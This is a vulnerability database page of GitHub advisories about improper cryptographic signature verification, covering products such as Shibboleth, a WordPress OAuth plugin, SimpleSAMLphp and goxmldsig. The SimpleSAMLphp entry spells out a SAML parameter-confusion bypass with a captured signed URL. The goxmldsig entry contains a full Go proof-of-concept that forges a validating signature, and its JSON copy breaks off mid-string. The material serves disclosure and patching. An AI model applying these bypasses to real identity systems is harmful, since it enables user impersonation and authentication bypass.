Common Weakness Enumeration

CWE-347

Allowed

Improper Verification of Cryptographic Signature

Abstraction: Base · Status: Draft

The product does not verify, or incorrectly verifies, the cryptographic signature for data.

1128 vulnerabilities reference this CWE, most recent first.

GHSA-4479-Q654-WMQ5

Vulnerability from github – Published: 2022-05-14 03:35 – Updated: 2022-05-14 03:35
VLAI
Details

Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-27T15:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.",
  "id": "GHSA-4479-q654-wmq5",
  "modified": "2022-05-14T03:35:52Z",
  "published": "2022-05-14T03:35:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0489"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2018/02/msg00031.html"
    },
    {
      "type": "WEB",
      "url": "https://shibboleth.net/community/advisories/secadv_20180227.txt"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2018/dsa-4126"
    },
    {
      "type": "WEB",
      "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-003.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/103172"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1040435"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-44HX-MV5H-WJ6C

Vulnerability from github – Published: 2025-10-04 03:32 – Updated: 2025-10-04 03:32
VLAI
Details

The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the get_resource_owner_from_id_token function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-9485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-04T03:15:38Z",
    "severity": "CRITICAL"
  },
  "details": "The OAuth Single Sign On \u2013 SSO (OAuth Client) plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 6.26.12. This is due to the plugin performing unsafe JWT token processing without verification or validation in the `get_resource_owner_from_id_token` function. This makes it possible for unauthenticated attackers to bypass authentication and gain access to any existing user account - including administrators in certain configurations - or to create arbitrary subscriber-level accounts.",
  "id": "GHSA-44hx-mv5h-wj6c",
  "modified": "2025-10-04T03:32:59Z",
  "published": "2025-10-04T03:32:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9485"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/miniorange-login-with-eve-online-google-facebook/tags/6.26.12/class-mooauth-widget.php#L577"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3360768/miniorange-login-with-eve-online-google-facebook"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d2448afc-70d1-4dd5-b73b-62d182ee9a8a?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-45HV-4HC6-JVF2

Vulnerability from github – Published: 2023-12-29 03:30 – Updated: 2023-12-29 03:30
VLAI
Details

Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-23432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-29T02:15:44Z",
    "severity": "HIGH"
  },
  "details": "\nSome Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file.\n\n",
  "id": "GHSA-45hv-4hc6-jvf2",
  "modified": "2023-12-29T03:30:28Z",
  "published": "2023-12-29T03:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23432"
    },
    {
      "type": "WEB",
      "url": "https://www.hihonor.com/global/security/cve-2023-23432"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-45PJ-QV6G-F89W

Vulnerability from github – Published: 2024-12-19 00:37 – Updated: 2024-12-19 00:37
VLAI
Details

A library injection vulnerability exists in Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-42004"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-18T23:15:08Z",
    "severity": "HIGH"
  },
  "details": "A library injection vulnerability exists in Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams\u0027s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application\u0027s permissions.",
  "id": "GHSA-45pj-qv6g-f89w",
  "modified": "2024-12-19T00:37:35Z",
  "published": "2024-12-19T00:37:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42004"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1973"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1973"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-464M-H7W2-29W7

Vulnerability from github – Published: 2026-02-10 06:30 – Updated: 2026-06-09 09:32
VLAI
Details

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information, unauthorized access to sensitive user data and potential disruption of normal system usage.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23687"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-10T04:16:03Z",
    "severity": "HIGH"
  },
  "details": "SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information, unauthorized access to sensitive user data and potential disruption of normal system usage.",
  "id": "GHSA-464m-h7w2-29w7",
  "modified": "2026-06-09T09:32:06Z",
  "published": "2026-02-10T06:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23687"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3697567"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2026/Jun/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4669-VH4J-5743

Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2022-05-13 01:50
VLAI
Details

The Linux kernel, as used in Ubuntu 18.10 and when booted with UEFI Secure Boot enabled, allows privileged local users to bypass intended Secure Boot restrictions and execute untrusted code by loading arbitrary kernel modules. This occurs because a modified kernel/module.c, in conjunction with certain configuration options, leads to mishandling of the result of signature verification.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-18653"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-26T00:29:00Z",
    "severity": "HIGH"
  },
  "details": "The Linux kernel, as used in Ubuntu 18.10 and when booted with UEFI Secure Boot enabled, allows privileged local users to bypass intended Secure Boot restrictions and execute untrusted code by loading arbitrary kernel modules. This occurs because a modified kernel/module.c, in conjunction with certain configuration options, leads to mishandling of the result of signature verification.",
  "id": "GHSA-4669-vh4j-5743",
  "modified": "2022-05-13T01:50:44Z",
  "published": "2022-05-13T01:50:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18653"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.net/bugs/1798863"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3832-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3835-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-46R4-F8GJ-XG56

Vulnerability from github – Published: 2025-03-11 19:23 – Updated: 2025-05-09 21:31
VLAI
Summary
The SimpleSAMLphp SAML2 library incorrectly verifies signatures for HTTP-Redirect binding
Details

Summary

There's a signature confusion attack in the HTTPRedirect binding. An attacker with any signed SAMLResponse via the HTTP-Redirect binding can cause the application to accept an unsigned message.

I believe that it exists for v4 only. I have not yet developed a PoC.

V5 is well designed and instead builds the signed query from the same message that will be consumed.

Details

What is verified

The data['SignedQuery'] is the string that will be verified by the public key.

It is defined here: https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L178-L217

THe code will iterate through each parameter name. Notably, sigQuery is overridden each time when processing, making the last of SAMLRequest/SAMLResponse used for sigQuery.

For example, given:

SAMLRequest=a&SAMLResponse=idpsigned

SAMLResponse=idpsigned will be set as sigQuery, then later verified

What is actually processed

Processing uses SAMLRequest parameter value first, (if it exists) then SAMLResponse:

https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L104-L113

Given this, the contents that are processed might not be the same as the data that is actually verified.

Exploiting

Suppose an attacker has a signed HTTP Redirect binding from IdP, say a signed logout response. :

SAMLResponse=idpsigned&RelayState=...&SigAlg=...&Signature

Then an attacker can append SAMLRequest in front:

SAMLRequest=unverifieddata&SAMLResponse=idpsigned&RelayState=...&SigAlg=...&Signature=..

SimpleSAMLPhp will only verify the SAMLResponse, but will actually use the SAMLRequest contents. The impact here is increased because there's no checks that SAMLRequest actually contains a Request, it could instead contain an Response, which allows the attacker to effectively impersonate any user within the SP.

IdPs

Microsoft Azure AD/Entra (and likely ADFS) signs the LogoutResponse via this SimpleSign format in HTTP Redirect binding. If an attacker logs out of Entra, they will be able to extract a valid Signature.

Attached is an HTTP Request when an I initiated a SLO request from the service provider to the IdP (entra). Then IdP POSTed this SAMLResponse with HTTP Redirect binding signature, via the user browser to the SP. It should be possible to carry out the described attack with this.

https://webhook.site/c6038292-6ef5-46ac-973d-d7c25520ec48/logout?SAMLResponse=fVJNa%2bMwEP0rRndZtmw5tnAMy%2fYSaC9N6aGXIsmjVMTRGI9M%2bvObdeihsPQ4w7x5HzM9mcs060c84ZqegWaMBNnhYc%2fejS1UW1TAnVU7XldK8s7JkcvOd60Db3zTsewVFgoY90zmBcsORCscIiUT061VyJqXJS%2fbl7LRUmrZ5mXdvLHsASiFaNKG%2fEhpJi3EFewH4jmnkEC4pqha2UnegFe8bozj3a4a%2bbhzUilZgKtbMW2yb7TxW%2foL7lkM9hTC2XnEOPvZXjDECb2N1lh7mvBsp%2bnsErDs8zJF0lsEe7YuUaOhQDqaC5BOTh%2f%2fPD3qmzE9L5jQ4cSGfrO43KG%2fgwwRLP8ssuHbIiXKryGOeKU8QhLSVN7WteejV8Bru%2bt4WynFbwE3bdVV5ahG0Ys759Dfj3VMJq30s%2fqLI2SvZlrhd020Tevj6hwQMTH04udS8b%2bHGL4A&Signature=Z%2f7gIPv7Gkgvqtwo0bzgXyum9IjHMfP0zTYuNbl%2fBUGlQ%2fU%2bbOZGZJ6Rk9wLUyvNQ5XlZRxZrfESNA%2bn0CVyIedsg9GxQKTi7VqPTJFJqEIP1BZaEpYYP3%2f6sFfLxfTMKecJoQdxnDE5Malte1hMj2UujWnLXOnp0CgO%2f%2fU2K52SoGckIzNDRB%2fJ6%2fysTn%2bDjBrmgdro%2fgdTyby9%2f3vm8dzY8pUkRCgMjlimShrZxr5U33wQvwPLIXlDgActr91RUtWKE0k8sy%2brshrK9DKLPo8AdTLk7NYhjSWdF7OG7uqgEeEo470tacqQuA09E0qDh8CWS%2bycLJijiGYWVyQa4Q%3d%3d&SigAlg=http%3a%2f%2fwww.w3.org%2f2001%2f04%2fxmldsig-more%23rsa-sha256
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.15"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "simplesamlphp/saml2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.0-alpha.19"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "simplesamlphp/saml2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-alpha.1"
            },
            {
              "fixed": "5.0.0-alpha.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.15"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "simplesamlphp/saml2-legacy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-27773"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-11T19:23:22Z",
    "nvd_published_at": "2025-03-11T19:15:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThere\u0027s a signature confusion attack in the HTTPRedirect binding. An attacker with any signed SAMLResponse via the HTTP-Redirect binding can cause the application to accept an unsigned message.\n\nI believe that it exists for v4 only. I have not yet developed a PoC.\n\nV5 is well designed and instead builds the signed query from the same message that will be consumed.\n### Details\n\n#### What is verified\nThe data[\u0027SignedQuery\u0027] is the string that will be verified by the public key. \n\nIt is defined here:\nhttps://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L178-L217\n\nTHe code will iterate through each parameter name. Notably, sigQuery is overridden each time when processing, making the last of SAMLRequest/SAMLResponse used for sigQuery.\n\nFor example, given:\n\nSAMLRequest=a\u0026SAMLResponse=idpsigned\n\nSAMLResponse=idpsigned will be set as sigQuery, then later verified\n\n\n#### What is actually processed\n\nProcessing uses SAMLRequest parameter value first, (if it exists) then SAMLResponse:\n\nhttps://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L104-L113\n\nGiven this, the contents that are processed might not be the same as the data that is actually verified.\n\n\n### Exploiting\nSuppose an attacker has a signed HTTP Redirect binding from IdP, say a signed logout response. :\n\nSAMLResponse=idpsigned\u0026RelayState=...\u0026SigAlg=...\u0026Signature\n\n\nThen an attacker can append SAMLRequest in front:\n\n`SAMLRequest=unverifieddata\u0026SAMLResponse=idpsigned\u0026RelayState=...\u0026SigAlg=...\u0026Signature=..`\n\nSimpleSAMLPhp will only verify the SAMLResponse, but will actually use the SAMLRequest contents. The impact here is increased because there\u0027s no checks that SAMLRequest actually contains a Request, it could instead contain an Response, which allows the attacker to effectively impersonate any user within the SP.\n\n\n### IdPs\n\nMicrosoft Azure AD/Entra (and likely ADFS) signs the LogoutResponse via this SimpleSign format in HTTP Redirect binding. If an attacker logs out of Entra, they will be able to extract a valid Signature.\n\nAttached is an HTTP Request when an I initiated a SLO request from the service provider to the IdP (entra). Then IdP POSTed this SAMLResponse with HTTP Redirect binding signature, via the user browser to the SP. It should be possible to carry out the described attack with this.\n\n```\nhttps://webhook.site/c6038292-6ef5-46ac-973d-d7c25520ec48/logout?SAMLResponse=fVJNa%2bMwEP0rRndZtmw5tnAMy%2fYSaC9N6aGXIsmjVMTRGI9M%2bvObdeihsPQ4w7x5HzM9mcs060c84ZqegWaMBNnhYc%2fejS1UW1TAnVU7XldK8s7JkcvOd60Db3zTsewVFgoY90zmBcsORCscIiUT061VyJqXJS%2fbl7LRUmrZ5mXdvLHsASiFaNKG%2fEhpJi3EFewH4jmnkEC4pqha2UnegFe8bozj3a4a%2bbhzUilZgKtbMW2yb7TxW%2foL7lkM9hTC2XnEOPvZXjDECb2N1lh7mvBsp%2bnsErDs8zJF0lsEe7YuUaOhQDqaC5BOTh%2f%2fPD3qmzE9L5jQ4cSGfrO43KG%2fgwwRLP8ssuHbIiXKryGOeKU8QhLSVN7WteejV8Bru%2bt4WynFbwE3bdVV5ahG0Ys759Dfj3VMJq30s%2fqLI2SvZlrhd020Tevj6hwQMTH04udS8b%2bHGL4A\u0026Signature=Z%2f7gIPv7Gkgvqtwo0bzgXyum9IjHMfP0zTYuNbl%2fBUGlQ%2fU%2bbOZGZJ6Rk9wLUyvNQ5XlZRxZrfESNA%2bn0CVyIedsg9GxQKTi7VqPTJFJqEIP1BZaEpYYP3%2f6sFfLxfTMKecJoQdxnDE5Malte1hMj2UujWnLXOnp0CgO%2f%2fU2K52SoGckIzNDRB%2fJ6%2fysTn%2bDjBrmgdro%2fgdTyby9%2f3vm8dzY8pUkRCgMjlimShrZxr5U33wQvwPLIXlDgActr91RUtWKE0k8sy%2brshrK9DKLPo8AdTLk7NYhjSWdF7OG7uqgEeEo470tacqQuA09E0qDh8CWS%2bycLJijiGYWVyQa4Q%3d%3d\u0026SigAlg=http%3a%2f%2fwww.w3.org%2f2001%2f04%2fxmldsig-more%23rsa-sha256\n```",
  "id": "GHSA-46r4-f8gj-xg56",
  "modified": "2025-05-09T21:31:08Z",
  "published": "2025-03-11T19:23:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/simplesamlphp/saml2/security/advisories/GHSA-46r4-f8gj-xg56"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27773"
    },
    {
      "type": "WEB",
      "url": "https://github.com/simplesamlphp/saml2/commit/7867d6099dc7f31bed1ea10e5bea159c5623d2a0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/simplesamlphp/saml2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L104-L113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L178-L217"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00013.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "The SimpleSAMLphp SAML2 library incorrectly verifies signatures for HTTP-Redirect binding"
}

GHSA-479M-364C-43VC

Vulnerability from github – Published: 2026-03-18 20:18 – Updated: 2026-03-27 20:58
VLAI
Summary
validateSignature Loop Variable Capture Signature Bypass in goxmldsig
Details

Details

The validateSignature function in validate.go goes through the references in the SignedInfo block to find one that matches the signed element's ID. In Go versions before 1.22, or when go.mod uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable _ref instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the ref pointer will always end up pointing to the last element in the SignedInfo.References slice after the loop.


Technical Details

The code takes the address of a loop iteration variable (&_ref). In the standard Go compiler, this variable is only allocated once for the whole loop, so its address stays the same, but its value changes with each iteration.

As a result, any pointer to this variable will always point to the value of the last element processed by the loop, no matter which element matched the search criteria.

Using Radare2, I found that the assembly at 0x1001c5908 (the start of the loop) loads the iteration values but does not create a new allocation (runtime.newobject) for the variable _ref inside the loop. The address &_ref stays the same during the loop (due to stack or heap slot reuse), which confirms the pointer aliasing issue.

// goxmldsig/validate.go (Lines 309-313)    
for _, _ref := range signedInfo.References {
        if _ref.URI == "" || _ref.URI[1:] == idAttr {
            ref = &_ref // <- Capture var address of loop
        }
    }


PoC

The PoC generates a signed document containing two elements and confirms that altering the first element to match the second produces a valid signature.

package main

import (
    "crypto/rand"
    "crypto/rsa"
    "crypto/tls"
    "crypto/x509"
    "encoding/base64"
    "fmt"
    "math/big"
    "time"

    "github.com/beevik/etree"
    dsig "github.com/russellhaering/goxmldsig"
)

func main() {
    key, err := rsa.GenerateKey(rand.Reader, 2048)
    if err != nil {
        panic(err)
    }

    template := &x509.Certificate{
        SerialNumber: big.NewInt(1),
        NotBefore:    time.Now().Add(-1 * time.Hour),
        NotAfter:     time.Now().Add(1 * time.Hour),
    }

    certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
    if err != nil {
        panic(err)
    }

    cert, _ := x509.ParseCertificate(certDER)

    doc := etree.NewDocument()
    root := doc.CreateElement("Root")
    root.CreateAttr("ID", "target")
    root.SetText("Malicious Content")

    tlsCert := tls.Certificate{
        Certificate: [][]byte{cert.Raw},
        PrivateKey:  key,
    }

    ks := dsig.TLSCertKeyStore(tlsCert)
    signingCtx := dsig.NewDefaultSigningContext(ks)

    sig, err := signingCtx.ConstructSignature(root, true)
    if err != nil {
        panic(err)
    }

    signedInfo := sig.FindElement("./SignedInfo")

    existingRef := signedInfo.FindElement("./Reference")
    existingRef.CreateAttr("URI", "#dummy")

    originalEl := etree.NewElement("Root")
    originalEl.CreateAttr("ID", "target")
    originalEl.SetText("Original Content")

    sig1, _ := signingCtx.ConstructSignature(originalEl, true)
    ref1 := sig1.FindElement("./SignedInfo/Reference").Copy()

    signedInfo.InsertChildAt(existingRef.Index(), ref1)

    c14n := signingCtx.Canonicalizer

    detachedSI := signedInfo.Copy()
    if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
        detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
    }

    canonicalBytes, err := c14n.Canonicalize(detachedSI)
    if err != nil {
        fmt.Println("c14n error:", err)
        return
    }

    hash := signingCtx.Hash.New()
    hash.Write(canonicalBytes)
    digest := hash.Sum(nil)

    rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
    if err != nil {
        panic(err)
    }

    sigVal := sig.FindElement("./SignatureValue")
    sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))

    certStore := &dsig.MemoryX509CertificateStore{
        Roots: []*x509.Certificate{cert},
    }
    valCtx := dsig.NewDefaultValidationContext(certStore)

    root.AddChild(sig)

    doc.SetRoot(root)
    str, _ := doc.WriteToString()
    fmt.Println("XML:")
    fmt.Println(str)

    validated, err := valCtx.Validate(root)
    if err != nil {
        fmt.Println("validation failed:", err)
    } else {
        fmt.Println("validation ok")
        fmt.Println("validated text:", validated.Text())
    }
}

Impact

This vulnerability lets an attacker get around integrity checks for certain signed elements by replacing their content with the content from another element that is also referenced in the same signature.


Remediation

Update the loop to capture the value correctly or use the index to reference the slice directly.

// goxmldsig/validate.go    
func (ctx *ValidationContext) validateSignature(el *etree.Element, sig *types.Signature) error {
    var ref *types.Reference

  // OLD
    // for _, _ref := range signedInfo.References {
    //  if _ref.URI == "" || _ref.URI[1:] == idAttr {
    //      ref = &_ref
    //  }
    // }

  // FIX
    for i := range signedInfo.References {
        if signedInfo.References[i].URI == "" ||
            signedInfo.References[i].URI[1:] == idAttr {
            ref = &signedInfo.References[i]
            break
        }
    }

    // ...
}

References

https://cwe.mitre.org/data/definitions/347.html

https://cwe.mitre.org/data/definitions/682.html

https://github.com/russellhaering/goxmldsig/blob/main/validate.go


Author: Tomas Illuminati

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/russellhaering/goxmldsig"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33487"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347",
      "CWE-682"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:18:22Z",
    "nvd_published_at": "2026-03-26T18:16:30Z",
    "severity": "HIGH"
  },
  "details": "### Details\n\nThe `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop.\n\n------\n\n### Technical Details\n\nThe code takes the address of a loop iteration variable (\u0026_ref). In the standard Go compiler, this variable is only allocated once for the whole loop, so its address stays the same, but its value changes with each iteration.\n\nAs a result, any pointer to this variable will always point to the value of the *last* element processed by the loop, no matter which element matched the search criteria.\n\nUsing Radare2, I found that the assembly at 0x1001c5908 (the start of the loop) loads the iteration values but does not create a new allocation (runtime.newobject) for the variable _ref inside the loop. The address \u0026_ref stays the same during the loop (due to stack or heap slot reuse), which confirms the pointer aliasing issue.\n\n```````go\n// goxmldsig/validate.go (Lines 309-313)\t\nfor _, _ref := range signedInfo.References {\n\t\tif _ref.URI == \"\" || _ref.URI[1:] == idAttr {\n\t\t\tref = \u0026_ref // \u003c- Capture var address of loop\n\t\t}\n\t}\n\n```````\n\n-----\n\n### PoC\n\nThe PoC generates a signed document containing two elements and confirms that altering the first element to match the second produces a valid signature.\n\n``````go\npackage main\n\nimport (\n\t\"crypto/rand\"\n\t\"crypto/rsa\"\n\t\"crypto/tls\"\n\t\"crypto/x509\"\n\t\"encoding/base64\"\n\t\"fmt\"\n\t\"math/big\"\n\t\"time\"\n\n\t\"github.com/beevik/etree\"\n\tdsig \"github.com/russellhaering/goxmldsig\"\n)\n\nfunc main() {\n\tkey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\ttemplate := \u0026x509.Certificate{\n\t\tSerialNumber: big.NewInt(1),\n\t\tNotBefore:    time.Now().Add(-1 * time.Hour),\n\t\tNotAfter:     time.Now().Add(1 * time.Hour),\n\t}\n\n\tcertDER, err := x509.CreateCertificate(rand.Reader, template, template, \u0026key.PublicKey, key)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tcert, _ := x509.ParseCertificate(certDER)\n\n\tdoc := etree.NewDocument()\n\troot := doc.CreateElement(\"Root\")\n\troot.CreateAttr(\"ID\", \"target\")\n\troot.SetText(\"Malicious Content\")\n\n\ttlsCert := tls.Certificate{\n\t\tCertificate: [][]byte{cert.Raw},\n\t\tPrivateKey:  key,\n\t}\n\n\tks := dsig.TLSCertKeyStore(tlsCert)\n\tsigningCtx := dsig.NewDefaultSigningContext(ks)\n\n\tsig, err := signingCtx.ConstructSignature(root, true)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsignedInfo := sig.FindElement(\"./SignedInfo\")\n\n\texistingRef := signedInfo.FindElement(\"./Reference\")\n\texistingRef.CreateAttr(\"URI\", \"#dummy\")\n\n\toriginalEl := etree.NewElement(\"Root\")\n\toriginalEl.CreateAttr(\"ID\", \"target\")\n\toriginalEl.SetText(\"Original Content\")\n\n\tsig1, _ := signingCtx.ConstructSignature(originalEl, true)\n\tref1 := sig1.FindElement(\"./SignedInfo/Reference\").Copy()\n\n\tsignedInfo.InsertChildAt(existingRef.Index(), ref1)\n\n\tc14n := signingCtx.Canonicalizer\n\n\tdetachedSI := signedInfo.Copy()\n\tif detachedSI.SelectAttr(\"xmlns:\"+dsig.DefaultPrefix) == nil {\n\t\tdetachedSI.CreateAttr(\"xmlns:\"+dsig.DefaultPrefix, dsig.Namespace)\n\t}\n\n\tcanonicalBytes, err := 